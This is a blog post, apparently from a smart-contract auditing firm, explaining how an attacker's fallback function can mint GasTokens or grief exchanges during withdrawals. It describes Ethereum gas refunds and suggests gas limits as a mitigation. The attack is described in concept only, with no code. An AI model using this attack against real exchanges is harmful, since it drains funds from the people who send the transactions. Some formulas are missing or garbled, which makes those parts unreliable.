Potential Attack on Ethereum Network to mint GasTokens

Table of Contents

Read Time: 4 minutes

Ethereum Network Vulnerability

The latest vulnerability, in ethereum framework uncovered by levelk, Potentially allows bad actors to mint large amounts of Gastokens or drain funds.

Discovered by whom?

In levelk’s hypothetical study or in a case study it is possible to mint large amount of GasTokens while receiving ETH or any ERC20, or other standard token.

The vulnerability that comes in light when fallback function of a receiver contract is able to carry out capricious computations that the transaction producer pays for, which comes with a risk of ‘griefing’.

What is a griefer?

A griefer or bad faith player is a player in a multiplayer video game who deliberately irritates and harasses other players within the game, using aspects of the game in intended or unintended ways. according to Wikipedia.

What is GAS?

Gas is a fundamental resource on ethereum blockchain, every transaction on ethereum network require some amount of gas to execute a transaction it may be 1 gwei or in two or three digits.

What is GasToken?

The gas token is kind of smart contract based on ethereum Blockchain, that allow users of ethereum blockchain to tokenize the gas when gas price are low and spend them when gas price are high.

It also becomes the first smart contract through which a user or an owner able to sale purchase gas on ethereum network.

How Gas token works?

The gas tokens works on taking advantage of storage refund concept in ethereum, to inspire smart contracts to delete storage variable, ethereum network provides refund when storage variable is deleted upto half of the contract transaction.

● If a variable is changed from zero to a non-zero value, there is a gas fee
● If a variable is changed from a non-zero value to zero, there is a gas refund

To profit from gasToken:

● Mint tokens when gasPrice is low: change a variable from a zero value to non-zero.
● Burn tokens when gasPrice is high: change a variable from non-zero to zero.

Example :

Writing permanent blockchain state costs a significant amount of gas. For instance, the STORE instruction currently costs 20000 gas when writing a non-zero value to storage. Erasing the storage costs an additional 5000 gas, but also provides a refund of 15000 gas.

Suppose we write to storage when gas has a price of gas low and redeem the token for a refund when gas prices are high, at gas high. Our total expenses per storage word are:’

20000⋅gaslow + 5000⋅gashigh</pre

We receive a refund per word of :

We could expect savings whenever :

gashigh > 2⋅gaslow

There are actually two versions of GasToken: one that uses storage to bank gas(used above GST1), and another one that banks gas by creating contracts. The latter takes advantage of the gas refund obtained when deleting a whole contract(GST2).


Comparison between two versions of GasToken


How the attacker gets the benefit?

A GasToken holder or owner can decrease the cost of a transaction when gasPrice is high by burning the GasToken minted when GasPrice was low or by attacking exchange or by calling function withdraw of any exchange that initiate transfer of funds of any ERC token that call fallback function of a smart contract of a attacker and it will be able to mine GasTokens or execute a transaction that may drain transaction originators funds.

Suggestion to avoid these type of attacks

Most of the exchanges are already aware of these types of minting attack but still fail to cover all the attacks, reason behind these is lack of developers knowledge, awareness of these attacks and existing tools could not be able to verify all the potential bugs and vulnerability in smart contract mostly related to delegate calls. This attack is even more harmful for, Exchanges that doesn’t implemented a proper KYC process as attackers can repeatedly mint GasTokens using different address.

Implementation of gas limit to all transaction should be applied,

required_gas_limit * gas_price

At QuillHash, we understand the Potential of Blockchain and have a good team of developers who can develop any blockchain applications like Smart Contracts, dApps,Smart Coins, DeFi, DEX on the any Blockchain Platform like EthereumEOS and Hyperledger.

To be up to date with our work, Join Our Community :-

Telegram | Twitter | Facebook | LinkedIn


Related Articles

💰$10 Billion was lost in #DeFi related #hacks in 2021, and this figure is expected to scale more heights this year🧵.

Catch it Here🚀: https://blog.quillhash.com/2022/01/19/beginners-guide-to-smart-contract-auditing-part-1/


💪 @MonsterNfts Begins Audit Process at @QuillAudits
QuillAudits - Smart Contracts Auditing Services, DeFi Safety Audits, Cybersecurity solutions for Blockchain & Crypto products

🚀 We are about to announce the big news. Do not miss


Latest edition of our Weekly #Newsletter📮.

|| IDO projects Rug Pulled on @BinanceChain, loss - $2.6M
|| @lcx Hot Wallets compromised, loss - $6.5M
|| Altcoin project #hacked: 136,000 tokens withdrawn.
|| @Polygon Discord bot impersonated.

Read Here🚀- https://quillaudits.substack.com/

We at QuillAudits are committed to #secure DeFi/NFT platforms!

Further, we would like to know your opinion over few questions on DeFi/Smart Contracts Security that would make #web3.0 platforms safe from any future potential threats.
#DeFi #Security


⚠️On Jan'1, 2022, @tinymanorg, a DEX On @Algorand suffered an #exploit & advised users to remove their liquidity as soon as possible.
Checkout the lessons one can learn from this event to keep their #DeFi protocol secure from rising #hacks👇.

Here🚀: https://blog.quillhash.com/2022/01/14/lessons-from-the-attack-on-tinyman-largest-dex-on-algorand/

Load More...